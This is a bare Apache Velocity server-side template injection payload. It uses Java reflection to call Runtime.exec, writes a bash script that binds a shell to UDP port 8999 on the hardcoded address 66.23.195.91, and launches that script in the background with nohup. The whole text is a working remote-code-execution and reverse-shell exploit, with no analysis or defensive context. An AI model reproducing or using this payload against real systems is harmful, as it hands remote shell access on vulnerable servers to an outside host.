#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec('echo \'#!/bin/bash\'>2.sh;echo >> 2.sh;echo "exec 3>/dev/udp/66.23.195.91/8999">>2.sh;echo >> 2.sh;echo "exec 2>&3" >> 2.sh;echo >> 2.sh;echo "exec 1>&3" >> 2.sh;echo >> 2.sh;echo "cat 0<&3 | bash | while read line;do echo $line;done" >> 2.sh;nohup ./2.sh &',null,null).toString();
